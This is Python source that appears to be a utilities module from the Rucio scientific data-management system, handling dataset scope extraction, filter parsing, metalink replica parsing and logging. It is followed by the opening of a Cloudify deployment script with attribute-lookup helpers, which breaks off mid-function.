if naming_convention is None or naming_convention not in _SURL_ALGORITHMS:
naming_convention = _DEFAULT_SURL
return _SURL_ALGORITHMS[naming_convention](dsn, filename)
def __strip_dsn(dsn):
"""
Drop the _sub and _dis suffixes for panda datasets from the lfc path
they will be registered in.
Method imported from DQ2.
"""
suffixes_to_drop = ['_dis', '_sub', '_frag']
fields = dsn.split('.')
last_field = fields[-1]
try:
for suffix in suffixes_to_drop:
last_field = re.sub('%s.*$' % suffix, '', last_field)
except IndexError:
return dsn
fields[-1] = last_field
stripped_dsn = '.'.join(fields)
return stripped_dsn
def __strip_tag(tag):
"""
Drop the _sub and _dis suffixes for panda datasets from the lfc path
they will be registered in
Method imported from DQ2.
"""
suffixes_to_drop = ['_dis', '_sub', '_tid']
stripped_tag = tag
try:
for suffix in suffixes_to_drop:
stripped_tag = re.sub('%s.*$' % suffix, '', stripped_tag)
except IndexError:
return stripped_tag
return stripped_tag
def clean_surls(surls):
res = []
for surl in surls:
if surl.startswith('srm'):
surl = re.sub(':[0-9]+/', '/', surl)
surl = re.sub(r'/srm/managerv1\?SFN=', '', surl)
surl = re.sub(r'/srm/v2/server\?SFN=', '', surl)
surl = re.sub(r'/srm/managerv2\?SFN=', '', surl)
if surl.startswith('https://storage.googleapis.com'):
surl = surl.split('?GoogleAccessId')[0]
if '?X-Amz' in surl:
surl = surl.split('?X-Amz')[0]
res.append(surl)
res.sort()
return res
_EXTRACT_SCOPE_ALGORITHMS = {}
_DEFAULT_EXTRACT = 'atlas'
def extract_scope_atlas(did, scopes):
# Try to extract the scope from the DSN
if did.find(':') > -1:
if len(did.split(':')) > 2:
raise RucioException('Too many colons. Cannot extract scope and name')
scope, name = did.split(':')[0], did.split(':')[1]
if name.endswith('/'):
name = name[:-1]
return scope, name
else:
scope = did.split('.')[0]
if did.startswith('user') or did.startswith('group'):
scope = ".".join(did.split('.')[0:2])
if did.endswith('/'):
did = did[:-1]
return scope, did
def extract_scope_belleii(did, scopes):
split_did = did.split('/')
if did.startswith('/belle/MC/'):
if did.startswith('/belle/MC/BG') or \
did.startswith('/belle/MC/build') or \
did.startswith('/belle/MC/generic') or \
did.startswith('/belle/MC/log') or \
did.startswith('/belle/MC/mcprod') or \
did.startswith('/belle/MC/prerelease') or \
did.startswith('/belle/MC/release'):
return 'mc', did
if did.startswith('/belle/MC/cert') or \
did.startswith('/belle/MC/dirac') or \
did.startswith('/belle/MC/dr3') or \
did.startswith('/belle/MC/fab') or \
did.startswith('/belle/MC/hideki') or \
did.startswith('/belle/MC/merge') or \
did.startswith('/belle/MC/migration') or \
did.startswith('/belle/MC/skim') or \
did.startswith('/belle/MC/test'):
return 'mc_tmp', did
if len(split_did) > 4:
if split_did[3].find('fab') > -1 or split_did[3].find('merge') > -1 or split_did[3].find('skim') > -1:
return 'mc_tmp', did
if split_did[3].find('release') > -1:
return 'mc', did
return 'mc_tmp', did
if did.startswith('/belle/Raw/'):
return 'raw', did
if did.startswith('/belle/hRaw'):
return 'hraw', did
if did.startswith('/belle/user/'):
if len(split_did) > 4:
if len(split_did[3]) == 1 and 'user.%s' % (split_did[4]) in scopes:
return 'user.%s' % split_did[4], did
if len(split_did) > 3:
if 'user.%s' % (split_did[3]) in scopes:
return 'user.%s' % split_did[3], did
return 'user', did
if did.startswith('/belle/group/'):
if len(split_did) > 4:
if 'group.%s' % (split_did[4]) in scopes:
return 'group.%s' % split_did[4], did
return 'group', did
if did.startswith('/belle/data/') or did.startswith('/belle/Data/'):
if len(split_did) > 4:
if split_did[3] in ['fab', 'skim']: # /belle/Data/fab --> data_tmp
return 'data_tmp', did
if split_did[3].find('release') > -1: # /belle/Data/release --> data
return 'data', did
if len(split_did) > 5:
if split_did[3] in ['proc']: # /belle/Data/proc
if split_did[4].find('release') > -1: # /belle/Data/proc/release*
if len(split_did) > 7 and split_did[6] in ['GCR2c', 'prod00000007', 'prod6b', 'proc7b',
'proc8b', 'Bucket4', 'Bucket6test', 'bucket6',
'proc9', 'bucket7', 'SKIMDATAx1', 'proc10Valid',
'proc10', 'SkimP10x1', 'SkimP11x1', 'SkimB9x1',
'SkimB10x1', 'SkimB11x1']: # /belle/Data/proc/release*/*/proc10/* --> data_tmp (Old convention)
return 'data_tmp', did
else: # /belle/Data/proc/release*/*/proc11/* --> data (New convention)
return 'data', did
if split_did[4].find('fab') > -1: # /belle/Data/proc/fab* --> data_tmp
return 'data_tmp', did
return 'data_tmp', did
if did.startswith('/belle/ddm/functional_tests/') or did.startswith('/belle/ddm/tests/') or did.startswith('/belle/test/ddm_test'):
return 'test', did
if did.startswith('/belle/BG/'):
return 'data', did
if did.startswith('/belle/collection'):
return 'collection', did
return 'other', did
def register_extract_scope_algorithm(extract_callable, name=[]):
if name is None:
name = extract_callable.__name__
_EXTRACT_SCOPE_ALGORITHMS[name] = extract_callable
register_extract_scope_algorithm(extract_scope_atlas, 'atlas')
register_extract_scope_algorithm(extract_scope_belleii, 'belleii')
def extract_scope(did, scopes=None, default_extract=_DEFAULT_EXTRACT):
extract_scope_convention = config_get('common', 'extract_scope', False, None)
if extract_scope_convention is None or extract_scope_convention not in _EXTRACT_SCOPE_ALGORITHMS:
extract_scope_convention = default_extract
return _EXTRACT_SCOPE_ALGORITHMS[extract_scope_convention](did=did, scopes=scopes)
def pid_exists(pid):
"""
Check whether pid exists in the current process table.
UNIX only.
"""
if pid < 0:
return False
if pid == 0:
# According to "man 2 kill" PID 0 refers to every process
# in the process group of the calling process.
# On certain systems 0 is a valid PID but we have no way
# to know that in a portable fashion.
raise ValueError('invalid PID 0')
try:
os.kill(pid, 0)
except OSError as err:
if err.errno == errno.ESRCH:
# ESRCH == No such process
return False
elif err.errno == errno.EPERM:
# EPERM clearly means there's a process to deny access to
return True
else:
# According to "man 2 kill" possible error values are
# (EINVAL, EPERM, ESRCH)
raise
else:
return True
def sizefmt(num, human=True):
"""
Print human readable file sizes
"""
if num is None:
return '0.0 B'
try:
num = int(num)
if human:
for unit in ['', 'k', 'M', 'G', 'T', 'P', 'E', 'Z']:
if abs(num) < 1000.0:
return "%3.3f %sB" % (num, unit)
num /= 1000.0
return "%.1f %sB" % (num, 'Y')
else:
return str(num)
except OverflowError:
return 'Inf'
def get_tmp_dir():
"""
Get a path where to store temporary files.
Rucio searches a standard list of temporary directories. The list is:
The directory named by the TMP environment variable.
The directory named by the TMPDIR environment variable.
The directory named by the TEMP environment variable.
As a last resort, the /tmp/ directory.
:return: A path.
"""
base_dir = os.path.abspath(tempfile.gettempdir())
try:
return os.path.join(base_dir, getpass.getuser())
except Exception:
pass
try:
return os.path.join(base_dir, str(os.getuid()))
except Exception:
pass
return base_dir
def is_archive(name):
'''
Check if a file name is an archive file or not.
:return: A boolean.
'''
regexp = r'^.*\.(zip|zipx|tar.gz|tgz|tar.Z|tar.bz2|tbz2)(\.\d+)*$'
if re.match(regexp, name, re.I):
return True
return False
class Color:
PURPLE = '\033[95m'
CYAN = '\033[96m'
DARKCYAN = '\033[36m'
BLUE = '\033[94m'
GREEN = '\033[92m'
YELLOW = '\033[93m'
RED = '\033[91m'
BOLD = '\033[1m'
UNDERLINE = '\033[4m'
END = '\033[0m'
def detect_client_location():
"""
Normally client IP will be set on the server side (request.remote_addr)
Here setting ip on the one seen by the host itself. There is no connection
to Google DNS servers.
Try to determine the sitename automatically from common environment variables,
in this order: SITE_NAME, ATLAS_SITE_NAME, OSG_SITE_NAME. If none of these exist
use the fixed string 'ROAMING'.
If environment variables sets location, it uses it.
"""
ip = None
try:
s = socket.socket(socket.AF_INET6, socket.SOCK_DGRAM)
s.connect(("2001:4860:4860:0:0:0:0:8888", 80))
ip = s.getsockname()[0]
except Exception:
pass
if not ip:
try:
s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
s.connect(("8.8.8.8", 80))
ip = s.getsockname()[0]
except Exception:
pass
if not ip:
ip = '0.0.0.0'
site = os.environ.get('SITE_NAME',
os.environ.get('ATLAS_SITE_NAME',
os.environ.get('OSG_SITE_NAME',
'ROAMING')))
latitude = os.environ.get('RUCIO_LATITUDE')
longitude = os.environ.get('RUCIO_LONGITUDE')
if latitude and longitude:
try:
latitude = float(latitude)
longitude = float(longitude)
except ValueError:
latitude = longitude = 0
print('Client set latitude and longitude are not valid.')
else:
latitude = longitude = None
return {'ip': ip,
'fqdn': socket.getfqdn(),
'site': site,
'latitude': latitude,
'longitude': longitude}
def ssh_sign(private_key, message):
"""
Sign a string message using the private key.
:param private_key: The SSH RSA private key as a string.
:param message: The message to sign as a string.
:return: Base64 encoded signature as a string.
"""
if PY3 and isinstance(message, str):
message = message.encode()
if not EXTRA_MODULES['paramiko']:
raise MissingModuleException('The paramiko module is not installed or faulty.')
sio_private_key = StringIO(private_key)
priv_k = RSAKey.from_private_key(sio_private_key)
sio_private_key.close()
signature_stream = priv_k.sign_ssh_data(message)
signature_stream.rewind()
base64_encoded = base64.b64encode(signature_stream.get_remainder())
if PY3:
base64_encoded = base64_encoded.decode()
return base64_encoded
def make_valid_did(lfn_dict):
"""
When managing information about a LFN (such as in `rucio upload` or
the RSE manager's upload), we add the `filename` attribute to record
the name of the file on the local disk in addition to the remainder
of the DID information.
This function will take that python dictionary, and strip out the
additional `filename` key. If this is not done, then the dictionary
will not pass the DID JSON schema validation.
"""
if 'filename' not in lfn_dict:
return lfn_dict
lfn_copy = dict(lfn_dict)
lfn_copy['name'] = lfn_copy.get('name', lfn_copy['filename'])
del lfn_copy['filename']
return lfn_copy
def send_trace(trace, trace_endpoint, user_agent, retries=5):
"""
Send the given trace to the trace endpoint
:param trace: the trace dictionary to send
:param trace_endpoint: the endpoint where the trace should be send
:param user_agent: the user agent sending the trace
:param retries: the number of retries if sending fails
:return: 0 on success, 1 on failure
"""
if user_agent.startswith('pilot'):
return 0
for dummy in range(retries):
try:
requests.post(trace_endpoint + '/traces/', verify=False, data=json.dumps(trace))
return 0
except Exception:
pass
return 1
def add_url_query(url, query):
"""
Add a new dictionary to URL parameters
:param url: The existing URL
:param query: A dictionary containing key/value pairs to be added to the URL
:return: The expanded URL with the new query parameters
"""
url_parts = list(urlparse(url))
mod_query = dict(parse_qsl(url_parts[4]))
mod_query.update(query)
url_parts[4] = urlencode(mod_query)
return urlunparse(url_parts)
def get_bytes_value_from_string(input_string):
"""
Get bytes from a string that represents a storage value and unit
:param input_string: String containing a value and an unit
:return: Integer value representing the value in bytes
"""
result = re.findall('^([0-9]+)([A-Za-z]+)$', input_string)
if result:
value = int(result[0][0])
unit = result[0][1].lower()
if unit == 'b':
value = value
elif unit == 'kb':
value = value * 1000
elif unit == 'mb':
value = value * 1000000
elif unit == 'gb':
value = value * 1000000000
elif unit == 'tb':
value = value * 1000000000000
elif unit == 'pb':
value = value * 1000000000000000
else:
return False
return value
else:
return False
def parse_did_filter_from_string(input_string):
"""
Parse DID filter options in format 'length<3,type=all' from string.
:param input_string: String containing the filter options.
:return: filter dictionary and type as string.
"""
filters = {}
type_ = 'collection'
if input_string:
filter_options = input_string.replace(' ', '').split(',')
for option in filter_options:
value = None
key = None
if '>=' in option:
key, value = option.split('>=')
if key == 'length':
key = 'length.gte'
elif '>' in option:
key, value = option.split('>')
if key == 'length':
key = 'length.gt'
elif '<=' in option:
key, value = option.split('<=')
if key == 'length':
key = 'length.lte'
elif '<' in option:
key, value = option.split('<')
if key == 'length':
key = 'length.lt'
elif '=' in option:
key, value = option.split('=')
if key == 'created_after' or key == 'created_before':
value = datetime.datetime.strptime(value, '%Y-%m-%dT%H:%M:%S.%fZ')
if key == 'type':
if value.upper() in ['ALL', 'COLLECTION', 'CONTAINER', 'DATASET', 'FILE']:
type_ = value.lower()
else:
raise InvalidType('{0} is not a valid type. Valid types are {1}'.format(value, ['ALL', 'COLLECTION', 'CONTAINER', 'DATASET', 'FILE']))
elif key in ('length.gt', 'length.lt', 'length.gte', 'length.lte', 'length'):
try:
value = int(value)
filters[key] = value
except ValueError:
raise ValueError('Length has to be an integer value.')
filters[key] = value
elif isinstance(value, string_types):
if value.lower() == 'true':
value = '1'
elif value.lower() == 'false':
value = '0'
filters[key] = value
else:
filters[key] = value
return filters, type_
def parse_did_filter_from_string_fe(input_string, name='*', type='collection', omit_name=False):
"""
Parse DID filter string for the filter engine (fe).
Should adhere to the following conventions:
- ';' represents the logical OR operator
- ',' represents the logical AND operator
- all operators belong to set of (<=, >=, ==, !=, >, <, =)
- there should be no duplicate key+operator criteria.
One sided and compound inequalities are supported.
Sanity checking of input is left to the filter engine.
:param input_string: String containing the filter options.
:param name: DID name.
:param type: The type of the did: all(container, dataset, file), collection(dataset or container), dataset, container.
:param omit_name: omit addition of name to filters.
:return: list of dictionaries with each dictionary as a separate OR expression.
"""
# lookup table unifying all comprehended operators to a nominal suffix.
# note that the order matters as the regex engine is eager, e.g. don't want to evaluate '<=' as '<' and '='.
operators_suffix_LUT = OrderedDict({
'<=': 'lte',
'>=': 'gte',
'==': '',
'!=': 'ne',
'>': 'gt',
'<': 'lt',
'=': ''
})
# lookup table mapping operator opposites, used to reverse compound inequalities.
operator_opposites_LUT = {
'lt': 'gt',
'lte': 'gte'
}
operator_opposites_LUT.update({op2: op1 for op1, op2 in operator_opposites_LUT.items()})
filters = []
if input_string:
or_groups = list(filter(None, input_string.split(';'))) # split <input_string> into OR clauses
for or_group in or_groups:
or_group = or_group.strip()
and_groups = list(filter(None, or_group.split(','))) # split <or_group> into AND clauses
and_group_filters = {}
for and_group in and_groups:
and_group = and_group.strip()
# tokenise this AND clause using operators as delimiters.
tokenisation_regex = "({})".format('|'.join(operators_suffix_LUT.keys()))
and_group_split_by_operator = list(filter(None, re.split(tokenisation_regex, and_group)))
if len(and_group_split_by_operator) == 3: # this is a one-sided inequality or expression
key, operator, value = [token.strip() for token in and_group_split_by_operator]
# substitute input operator with the nominal operator defined by the LUT, <operators_suffix_LUT>.
operator_mapped = operators_suffix_LUT.get(operator)
filter_key_full = key
if operator_mapped is not None:
if operator_mapped:
filter_key_full = "{}.{}".format(key, operator_mapped)
else:
raise DIDFilterSyntaxError("{} operator not understood.".format(operator_mapped))
if filter_key_full in and_group_filters:
raise DuplicateCriteriaInDIDFilter(filter_key_full)
else:
and_group_filters[filter_key_full] = value
elif len(and_group_split_by_operator) == 5: # this is a compound inequality
value1, operator1, key, operator2, value2 = [token.strip() for token in and_group_split_by_operator]
# substitute input operator with the nominal operator defined by the LUT, <operators_suffix_LUT>.
operator1_mapped = operator_opposites_LUT.get(operators_suffix_LUT.get(operator1))
operator2_mapped = operators_suffix_LUT.get(operator2)
filter_key1_full = filter_key2_full = key
if operator1_mapped is not None and operator2_mapped is not None:
if operator1_mapped: # ignore '' operator (maps from equals)
filter_key1_full = "{}.{}".format(key, operator1_mapped)
if operator2_mapped: # ignore '' operator (maps from equals)
filter_key2_full = "{}.{}".format(key, operator2_mapped)
else:
raise DIDFilterSyntaxError("{} operator not understood.".format(operator_mapped))
if filter_key1_full in and_group_filters:
raise DuplicateCriteriaInDIDFilter(filter_key1_full)
else:
and_group_filters[filter_key1_full] = value1
if filter_key2_full in and_group_filters:
raise DuplicateCriteriaInDIDFilter(filter_key2_full)
else:
and_group_filters[filter_key2_full] = value2
else:
raise DIDFilterSyntaxError(and_group)
# add name key to each AND clause if it hasn't already been populated from the filter and <omit_name> not set.
if not omit_name and 'name' not in and_group_filters:
and_group_filters['name'] = name
filters.append(and_group_filters)
else:
if not omit_name:
filters.append({
'name': name
})
return filters, type
def parse_replicas_from_file(path):
"""
Parses the output of list_replicas from a json or metalink file
into a dictionary. Metalink parsing is tried first and if it fails
it tries to parse json.
:param path: the path to the input file
:returns: a list with a dictionary for each file
"""
with open(path) as fp:
try:
root = ElementTree.parse(fp).getroot()
return parse_replicas_metalink(root)
except ElementTree.ParseError as xml_err:
try:
return json.load(fp)
except ValueError as json_err:
raise MetalinkJsonParsingError(path, xml_err, json_err)
def parse_replicas_from_string(string):
"""
Parses the output of list_replicas from a json or metalink string
into a dictionary. Metalink parsing is tried first and if it fails
it tries to parse json.
:param string: the string to parse
:returns: a list with a dictionary for each file
"""
try:
root = ElementTree.fromstring(string)
return parse_replicas_metalink(root)
except ElementTree.ParseError as xml_err:
try:
return json.loads(string)
except ValueError as json_err:
raise MetalinkJsonParsingError(string, xml_err, json_err)
def parse_replicas_metalink(root):
"""
Transforms the metalink tree into a list of dictionaries where
each dictionary describes a file with its replicas.
Will be called by parse_replicas_from_file and parse_replicas_from_string.
:param root: root node of the metalink tree
:returns: a list with a dictionary for each file
"""
files = []
# metalink namespace
ns = '{urn:ietf:params:xml:ns:metalink}'
str_to_bool = {'true': True, 'True': True, 'false': False, 'False': False}
# loop over all <file> tags of the metalink string
for file_tag_obj in root.findall(ns + 'file'):
# search for identity-tag
identity_tag_obj = file_tag_obj.find(ns + 'identity')
if not ElementTree.iselement(identity_tag_obj):
raise InputValidationError('Failed to locate identity-tag inside %s' % ElementTree.tostring(file_tag_obj))
cur_file = {'did': identity_tag_obj.text,
'adler32': None,
'md5': None,
'sources': []}
parent_dids = set()
parent_dids_tag_obj = file_tag_obj.find(ns + 'parents')
if ElementTree.iselement(parent_dids_tag_obj):
for did_tag_obj in parent_dids_tag_obj.findall(ns + 'did'):
parent_dids.add(did_tag_obj.text)
cur_file['parent_dids'] = parent_dids
size_tag_obj = file_tag_obj.find(ns + 'size')
cur_file['bytes'] = int(size_tag_obj.text) if ElementTree.iselement(size_tag_obj) else None
for hash_tag_obj in file_tag_obj.findall(ns + 'hash'):
hash_type = hash_tag_obj.get('type')
if hash_type:
cur_file[hash_type] = hash_tag_obj.text
for url_tag_obj in file_tag_obj.findall(ns + 'url'):
key_rename_map = {'location': 'rse'}
src = {}
for k, v in url_tag_obj.items():
k = key_rename_map.get(k, k)
src[k] = str_to_bool.get(v, v)
src['pfn'] = url_tag_obj.text
cur_file['sources'].append(src)
files.append(cur_file)
return files
def get_thread_with_periodic_running_function(interval, action, graceful_stop):
"""
Get a thread where a function runs periodically.
:param interval: Interval in seconds when the action fucntion should run.
:param action: Function, that should run periodically.
:param graceful_stop: Threading event used to check for graceful stop.
"""
def start():
while not graceful_stop.is_set():
starttime = time.time()
action()
time.sleep(interval - ((time.time() - starttime)))
t = threading.Thread(target=start)
return t
def run_cmd_process(cmd, timeout=3600):
"""
shell command parser with timeout
:param cmd: shell command as a string
:param timeout: in seconds
:return: stdout xor stderr, and errorcode
"""
time_start = datetime.datetime.now().second
process = subprocess.Popen(cmd, stdout=subprocess.PIPE, stderr=subprocess.PIPE, shell=True, preexec_fn=os.setsid)
running_time = 0
while process.poll() is None and running_time < timeout:
time_now = datetime.datetime.now().second
running_time = int(time_now - time_start)
time.sleep(3)
if process.poll() is None:
process.terminate()
time.sleep(3)
if process.poll() is None:
process.kill()
stdout, stderr = process.communicate()
if isinstance(stdout, binary_type):
stdout = ensure_text(stdout, errors='replace')
stderr = ensure_text(stderr, errors='replace')
if not stderr:
stderr = ''
if not stdout:
stdout = ''
if stderr and stderr != '':
stdout += " Error: " + stderr
if process:
returncode = process.returncode
else:
returncode = 1
if returncode != 1 and 'Command time-out' in stdout:
returncode = 1
if returncode is None:
returncode = 0
return returncode, stdout
def api_update_return_dict(dictionary):
"""
Ensure that rse is in a dictionary returned from core
:param dictionary: The dictionary to edit
:returns dictionary: The edited dictionary
"""
if not isinstance(dictionary, dict):
return dictionary
copied = False # Avoid side effects from pass by object
for rse_str in ['rse', 'src_rse', 'source_rse', 'dest_rse', 'destination_rse']:
rse_id_str = '%s_id' % rse_str
if rse_id_str in dictionary.keys() and dictionary[rse_id_str] is not None:
if rse_str not in dictionary.keys():
if not copied:
dictionary = dictionary.copy()
copied = True
import rucio.core.rse
dictionary[rse_str] = rucio.core.rse.get_rse_name(rse_id=dictionary[rse_id_str])
if 'account' in dictionary.keys() and dictionary['account'] is not None:
if not copied:
dictionary = dictionary.copy()
copied = True
dictionary['account'] = dictionary['account'].external
if 'scope' in dictionary.keys() and dictionary['scope'] is not None:
if not copied:
dictionary = dictionary.copy()
copied = True
dictionary['scope'] = dictionary['scope'].external
return dictionary
def get_parsed_throttler_mode(throttler_mode):
""" Parse the conveyor-throttler mode string. """
direction = None
all_activities = None
if throttler_mode == 'DEST_PER_ACT':
direction = 'destination'
all_activities = False
elif throttler_mode == 'DEST_PER_ALL_ACT':
direction = 'destination'
all_activities = True
elif throttler_mode == 'SRC_PER_ACT':
direction = 'source'
all_activities = False
elif throttler_mode == 'SRC_PER_ALL_ACT':
direction = 'source'
all_activities = True
return (direction, all_activities)
def setup_logger(module_name=None, logger_name=None, logger_level=None, verbose=False):
'''
Factory method to set logger with handlers.
:param module_name: __name__ of the module that is calling this method
:param logger_name: name of the logger, typically name of the module.
:param logger_level: if not given, fetched from config.
:param verbose: verbose option set in bin/rucio
'''
# helper method for cfg check
def _force_cfg_log_level(cfg_option):
cfg_forced_modules = config_get('logging', cfg_option, raise_exception=False, default=None, clean_cached=True,
check_config_table=False)
if cfg_forced_modules:
if re.match(str(cfg_forced_modules), module_name):
return True
return False
# creating log
if not logger_name:
if not module_name:
logger_name = 'usr'
else:
logger_name = module_name.split('.')[-1]
logger = logging.getLogger(logger_name)
# extracting the log level
if not logger_level:
logger_level = logging.INFO
if verbose:
logger_level = logging.DEBUG
# overriding by the config
cfg_levels = (logging.DEBUG, logging.INFO, logging.WARNING, logging.ERROR)
for level in cfg_levels:
cfg_opt = 'forceloglevel' + logging.getLevelName(level)
if _force_cfg_log_level(cfg_opt):
logger_level = level
# setting the log level
logger.setLevel(logger_level)
# preferred logger handling
def add_handler(logger):
hdlr = logging.StreamHandler()
def emit_decorator(fnc):
def func(*args):
if 'RUCIO_LOGGING_FORMAT' not in os.environ:
levelno = args[0].levelno
format_str = '%(asctime)s\t%(levelname)s\t%(message)s\033[0m'
if levelno >= logging.CRITICAL:
color = '\033[31;1m'
elif levelno >= logging.ERROR:
color = '\033[31;1m'
elif levelno >= logging.WARNING:
color = '\033[33;1m'
elif levelno >= logging.INFO:
color = '\033[32;1m'
elif levelno >= logging.DEBUG:
color = '\033[36;1m'
format_str = '%(asctime)s\t%(levelname)s\t%(filename)s\t%(message)s\033[0m'
else:
color = '\033[0m'
formatter = logging.Formatter('{0}{1}'.format(color, format_str))
else:
formatter = logging.Formatter(os.environ['RUCIO_LOGGING_FORMAT'])
hdlr.setFormatter(formatter)
return fnc(*args)
return func
hdlr.emit = emit_decorator(hdlr.emit)
logger.addHandler(hdlr)
# setting handler and formatter
if not logger.handlers:
add_handler(logger)
return logger
def daemon_sleep(start_time, sleep_time, graceful_stop, logger=logging.log):
"""Sleeps a daemon the time provided by sleep_time"""
end_time = time.time()
time_diff = end_time - start_time
if time_diff < sleep_time:
logger(logging.INFO, 'Sleeping for a while : %s seconds', (sleep_time - time_diff))
graceful_stop.wait(sleep_time - time_diff)
def is_client():
""""
Checks if the function is called from a client or from a server/daemon
:returns client_mode: True if is called from a client, False if it is called from a server/daemon
"""
if 'RUCIO_CLIENT_MODE' not in os.environ:
if config_has_section('database'):
client_mode = False
elif config_has_section('client'):
client_mode = True
else:
client_mode = False
else:
if os.environ['RUCIO_CLIENT_MODE']:
client_mode = True
else:
client_mode = False
return client_mode
class retry:
"""Retry callable object with configuragle number of attempts"""
def __init__(self, func, *args, **kwargs):
'''
:param func: a method that should be executed with retries
:param args parametres of the func
:param kwargs: key word arguments of the func
'''
self.func, self.args, self.kwargs = func, args, kwargs
def __call__(self, mtries=3, logger=logging.log):
'''
:param mtries: maximum number of attempts to execute the function
:param logger: preferred logger
'''
attempt = mtries
while attempt > 1:
try:
if logger:
logger(logging.DEBUG, '{}: Attempt {}'.format(self.func.__name__, mtries - attempt + 1))
return self.func(*self.args, **self.kwargs)
except Exception as e:
if logger:
logger(logging.DEBUG, '{}: Attempt failed {}'.format(self.func.__name__, mtries - attempt + 1))
logger(logging.DEBUG, str(e))
attempt -= 1
return self.func(*self.args, **self.kwargs)
class StoreAndDeprecateWarningAction(argparse.Action):
'''
StoreAndDeprecateWarningAction is a descendant of :class:`argparse.Action`
and represents a store action with a deprecated argument name.
'''
def __init__(self,
option_strings,
new_option_string,
dest,
**kwargs):
"""
:param option_strings: all possible argument name strings
:param new_option_string: the new option string which replaces the old
:param dest: name of variable to store the value in
:param kwargs: everything else
"""
super(StoreAndDeprecateWarningAction, self).__init__(
option_strings=option_strings,
dest=dest,
**kwargs)
assert new_option_string in option_strings
self.new_option_string = new_option_string
def __call__(self, parser, namespace, values, option_string=None):
if option_string and option_string != self.new_option_string:
# The logger gets typically initialized after the argument parser
# to set the verbosity of the logger. Thus using simple print to console.
print("Warning: The commandline argument {} is deprecated! Please use {} in the future.".format(option_string, self.new_option_string))
setattr(namespace, self.dest, values)
class StoreTrueAndDeprecateWarningAction(argparse._StoreConstAction):
'''
StoreAndDeprecateWarningAction is a descendant of :class:`argparse.Action`
and represents a store action with a deprecated argument name.
'''
def __init__(self,
option_strings,
new_option_string,
dest,
default=False,
required=False,
help=None):
"""
:param option_strings: all possible argument name strings
:param new_option_string: the new option string which replaces the old
:param dest: name of variable to store the value in
:param kwargs: everything else
"""
super(StoreTrueAndDeprecateWarningAction, self).__init__(
option_strings=option_strings,
dest=dest,
const=True,
default=default,
required=required,
help=help)
assert new_option_string in option_strings
self.new_option_string = new_option_string
def __call__(self, parser, namespace, values, option_string=None):
super(StoreTrueAndDeprecateWarningAction, self).__call__(parser, namespace, values, option_string=option_string)
if option_string and option_string != self.new_option_string:
# The logger gets typically initialized after the argument parser
# to set the verbosity of the logger. Thus using simple print to console.
print("Warning: The commandline argument {} is deprecated! Please use {} in the future.".format(option_string, self.new_option_string))
|
_a4c_start.py
|
from cloudify import ctx
from cloudify import utils
from cloudify.exceptions import NonRecoverableError
from StringIO import StringIO
import base64
import os
import platform
import re
import subprocess
import sys
import time
import threading
import platform
import json
def convert_env_value_to_string(envDict):
for key, value in envDict.items():
envDict[str(key)] = str(envDict.pop(key))
def get_attribute_user(ctx):
if get_attribute_from_top_host(ctx, 'user'):
return get_attribute_from_top_host(ctx, 'user')
if get_attribute(ctx, 'cloudify_agent'):
return get_attribute(ctx, 'cloudify_agent').get('user', None)
if get_attribute(ctx, 'agent_config'):
return get_attribute(ctx, 'agent_config').get('user', None)
return None
def get_attribute_key(ctx):
if get_attribute_from_top_host(ctx, 'key'):
return get_attribute_from_top_host(ctx, 'key')
if get_attribute(ctx, 'cloudify_agent'):
return get_attribute(ctx, 'cloudify_agent').get('key', None)
if get_attribute(ctx, 'agent_config'):
return get_attribute(ctx, 'agent_config').get('key', None)
return None
def get_host(entity):
if entity.instance.relationships:
for relationship in entity.instance.relationships:
if 'cloudify.relationships.contained_in' in relationship.type_hierarchy:
return relationship.target
return None
def has_attribute_mapping(entity, attribute_name):
# ctx.logger.debug('Check if it exists mapping for attribute {0} in {1}'.format(attribute_name,json.dumps(entity.node.properties)))
mapping_configuration = entity.node.properties.get('_a4c_att_' + attribute_name, None)
if mapping_configuration is not None:
if mapping_configuration['parameters'][0] == 'SELF' and mapping_configuration['parameters'][1] == attribute_name:
return False
else:
return True
return False
def process_attribute_mapping(entity, attribute_name, data_retriever_function):
# This is where attribute mapping is defined in the cloudify type
mapping_configuration = entity.node.properties['_a4c_att_' + attribute_name]
# ctx.logger.debug('Mapping configuration found for attribute {0} is {1}'.format(attribute_name, json.dumps(mapping_configuration)))
# If the mapping configuration exist and if it concerns SELF then just get attribute of the mapped attribute name
# Else if it concerns TARGET then follow the relationship and retrieved the mapped attribute name from the TARGET
if mapping_configuration['parameters'][0] == 'SELF':
return data_retriever_function(entity, mapping_configuration['parameters'][1])
elif mapping_configuration['parameters'][0] == 'TARGET' and entity.instance.relationships:
for relationship in entity.instance.relationships:
if mapping_configuration['parameters'][1] in relationship.type_hierarchy:
return data_retriever_function(relationship.target, mapping_configuration['parameters'][2])
return ""
def get_nested_attribute(entity, attribute_names):
deep_properties = get_attribute(entity, attribute_names[0])
attribute_names_iter = iter(attribute_names)
next(attribute_names_iter)
for attribute_name in attribute_names_iter:
if deep_properties is None:
return ""
else:
deep_properties = deep_properties.get(attribute_name, None)
return deep_properties
def _all_instances_get_nested_attribute(entity, attribute_names):
return None
def get_attribute(entity, attribute_name):
if has_attribute_mapping(entity, attribute_name):
# First check if any mapping exist for attribute
mapped_value = process_attribute_mapping(entity, attribute_name, get_attribute)
# ctx.logger.debug('Mapping exists for attribute {0} with value {1}'.format(attribute_name, json.dumps(mapped_value)))
return mapped_value
# No mapping exist, try to get directly the attribute from the entity
attribute_value = entity.instance.runtime_properties.get(attribute_name, None)
if attribute_value is not None:
# ctx.logger.debug('Found the attribute {0} with value {1} on the node {2}'.format(attribute_name, json.dumps(attribute_value), entity.node.id))
return attribute_value
# Attribute retrieval fails, fall back to property
property_value = entity.node.properties.get(attribute_name, None)
if property_value is not None:
return property_value
# Property retrieval fails, fall back to host instance
host = get_host(entity)
if host is not None:
# ctx.logger.debug('Attribute not found {0} go up to the parent node {1}'.format(attribute_name, host.node.id))
return get_attribute(host, attribute_name)
# Nothing is found
return ""
def get_target_capa_or_node_attribute(entity, capability_attribute_name, attribute_name):
attribute_value = entity.instance.runtime_properties.get(capability_attribute_name, None)
if attribute_value is not None:
# ctx.logger.debug('Found the capability attribute {0} with value {1} on the node {2}'.format(attribute_name, json.dumps(attribute_value), entity.node.id))
return attribute_value
return get_attribute(entity, attribute_name)
def _all_instances_get_attribute(entity, attribute_name):
result_map = {}
# get all instances data using cfy rest client
# we have to get the node using the rest client with node_instance.node_id
# then we will have the relationships
node = client.nodes.get(ctx.deployment.id, entity.node.id)
all_node_instances = client.node_instances.list(ctx.deployment.id, entity.node.id)
for node_instance in all_node_instances:
prop_value = __recursively_get_instance_data(node, node_instance, attribute_name)
